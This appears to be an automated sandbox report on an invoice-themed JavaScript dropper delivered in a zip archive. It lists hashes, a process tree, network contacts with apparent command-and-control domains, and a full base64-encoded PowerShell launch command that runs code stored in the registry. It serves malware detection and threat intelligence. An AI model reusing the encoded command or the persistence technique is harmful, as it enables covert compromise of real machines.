File name: | Nuovo documento 1.zip |
Full analysis: | https://app.any.run/tasks/acc80e15-476f-46bd-b0dd-287580975e1e |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 06:23:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v1.0 to extract |
MD5: | 6E337DB06E57230F84D7F42B84444E94 |
SHA1: | 4F7F101C0A1AB313428FB4CAE473B5FD0F633840 |
SHA256: | 2A64599F3F28D13C2F0F80794002B52CAA6CCC4E57E843CFA32E888F9D215D44 |
SSDEEP: | 3072:dmkPjVUE42lTsIsrF5B4+qaQP7MtE+TTzP40L7/UMvxlDQU3bTEhTEEnLMzR9roQ:dmkrifoTqrFftQvO7sMZg+GMzRuli |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 10 |
---|---|
ZipBitFlag: | - |
ZipCompression: | None |
ZipModifyDate: | 2018:07:17 11:45:02 |
ZipCRC: | 0x00000000 |
ZipCompressedSize: | - |
ZipUncompressedSize: | - |
ZipFileName: | Nuovo documento 1/ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2072 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Nuovo documento 1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2720 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Nuovo documento 1\Fattura_32423.js" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2124 | C:\Users\admin\AppData\Local\Temp\tmp.exe | C:\Users\admin\AppData\Local\Temp\tmp.exe | WScript.exe | |
User: admin Company: Cisco Systems, Inc. Integrity Level: MEDIUM Description: Cisco Systems VPN Client Exit code: 0 Version: 5.0.07.0440 | ||||
2820 | "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding | C:\Program Files\Internet Explorer\iexplore.exe | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2568 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2820 CREDAT:267521 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
548 | "C:\Windows\System32\forfiles.exe" /p C:\Windows\system32 /s /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA==" /m p*ll.*e | C:\Windows\System32\forfiles.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ForFiles - Executes a command on selected files Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2304 | /c "powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA== | C:\Windows\System32\cmd.exe | — | forfiles.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2876 | powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA== | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2628 | "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\opikqlw8.cmdline" | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.5483 (Win7SP1GDR.050727-5400) | ||||
944 | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA3E9.tmp" "c:\Users\admin\AppData\Local\Temp\CSCA3E8.tmp" | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.5003 (Win7SP1GDR.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2072 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2072.13958\Nuovo documento 1\zzzzz.jpg | — | |
MD5:— | SHA256:— | |||
2072 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2072.13958\Nuovo documento 1\Fattura_32423.js | — | |
MD5:— | SHA256:— | |||
1944 | explorer.exe | C:\Users\admin\Desktop\Nuovo documento 1 | — | |
MD5:— | SHA256:— | |||
2820 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFAEB46C825A1A5A20.TMP | — | |
MD5:— | SHA256:— | |||
2820 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2820 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
2876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T1SC0ZEK339DTPS766PN.temp | — | |
MD5:— | SHA256:— | |||
2820 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF73E4A28FB930227B.TMP | — | |
MD5:— | SHA256:— | |||
2820 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{80CEEEAB-A85B-11E9-9FBD-5254004AAD21}.dat | — | |
MD5:— | SHA256:— | |||
2628 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCA3E8.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2820 | iexplore.exe | GET | 200 | 152.199.19.161:443 | https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin | US | — | — | whitelisted |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 19.8 Kb | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 35.6 Kb | unknown |
2820 | iexplore.exe | GET | 304 | 152.199.19.161:443 | https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml | US | — | — | whitelisted |
2568 | IEXPLORE.EXE | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | text | 44.4 Kb | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 29.4 Kb | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 465 b | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 37.7 Kb | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 31.1 Kb | unknown |
2820 | iexplore.exe | GET | 200 | 152.199.19.161:443 | https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml | US | xml | 357 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2820 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2124 | tmp.exe | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
1944 | explorer.exe | 93.170.76.72:443 | cocoon1city.com | RECONN. Operator Svyazi, LLC | RU | unknown |
2568 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
2820 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2820 | iexplore.exe | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
2320 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
2788 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
1448 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
952 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
Domain | IP | Reputation |
---|---|---|
kolaandpepsi.com |
| unknown |
api.bing.com |
| whitelisted |
www.bing.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
cocoon1city.com |
| unknown |
curlmyip.net |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup) |
— | — | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup) |
— | — | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup) |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
|